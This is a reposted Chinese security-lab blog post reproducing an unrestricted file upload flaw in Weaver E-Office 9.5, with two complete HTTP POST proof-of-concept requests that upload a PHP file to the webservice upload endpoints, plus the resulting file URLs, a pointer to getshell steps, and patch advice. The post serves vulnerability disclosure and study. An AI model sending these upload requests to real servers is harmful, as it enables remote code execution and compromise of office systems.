泛微E-Office文件上传漏洞

admin
admin
admin
103589
文章
87
评论
2023年8月12日19:29:39评论131 views字数 2148阅读7分9秒阅读模式



网安引领时代,弥天点亮未来   





 

泛微E-Office文件上传漏洞

0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
泛微E-Office文件上传漏洞

0x01漏洞介绍

Weaver E-Office是中国泛微科技(Weaver)公司的一个协同办公系统。

Weaver E-Office 9.5版本存在代码问题漏洞,该漏洞源于文件/webservice/upload/upload.php/webservice/upload.php存在问题,对参数Filedata的操作会导致不受限制的上传。

泛微E-Office文件上传漏洞

泛微E-Office文件上传漏洞

0x02影响版本

Weaver E-Office 9.5版



泛微E-Office文件上传漏洞

0x03漏洞复现

1.部署漏洞环境访问

泛微E-Office文件上传漏洞

2.对漏洞进行复现

  Poc (POST)

  路径1 /webservice/upload/upload.php

POST /webservice/upload/upload.php HTTP/1.1Host: 10.211.55.3:8082User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: USER_NAME_COOKIE=admin; LOGIN_LANG=cnConnection: keep-alive

Content-Type: multipart/form-data; boundary=---------------------------10267625012906Content-Length: 208-----------------------------10267625012906Content-Disposition: form-data; name="file"; filename="1.php"Content-Type: application/php<?php echo md5(43856);unlink(__FILE__);?>-----------------------------10267625012906--

漏洞复现

POST请求,响应存在漏洞

泛微E-Office文件上传漏洞

        解析php文件 

http://10.211.55.3:8082/attachment/870392248/pufh.php4

泛微E-Office文件上传漏洞

路径2 /webservice/upload.php

POST /webservice/upload.php HTTP/1.1Host: 10.211.55.3:8082User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36Content-Length: 220Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiuklAccept-Encoding: gzipConnection: close
------WebKitFormBoundaryakbyiuklContent-Disposition: form-data; name="file"; filename="pufh.php4"Content-Type: application/octet-stream
<?php echo md5(43856);unlink(__FILE__);?>------WebKitFormBoundaryakbyiukl--

泛微E-Office文件上传漏洞

解析php文件 

http://10.211.55.3:8082/attachment/2085157518/pufh.php4

泛微E-Office文件上传漏洞

流量情况

泛微E-Office文件上传漏洞

3.afrog_2.6.0工具测试(漏洞存在)上传测试文件。

泛微E-Office文件上传漏洞


4.Getshell同泛微E-Office文件上传漏洞(CVE-2023-2648)操作,这里省略.......

泛微E-Office文件上传漏洞(CVE-2023-2648)



泛微E-Office文件上传漏洞

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://service.e-office.cn/downloadhttps://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0125592


弥天简介

学海浩茫,予以风动,必降弥天之润!弥天弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。

口号 网安引领时代,弥天点亮未来


















泛微E-Office文件上传漏洞 


知识分享完了

喜欢别忘了关注我们哦~


学海浩茫,

予以风动,
必降弥天之润!


   弥  天

安全实验室

泛微E-Office文件上传漏洞


原文始发于微信公众号(弥天安全实验室):泛微E-Office文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月12日19:29:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微E-Office文件上传漏洞http://cn-sec.com/archives/1952621.html

发表评论

匿名网友 填写信息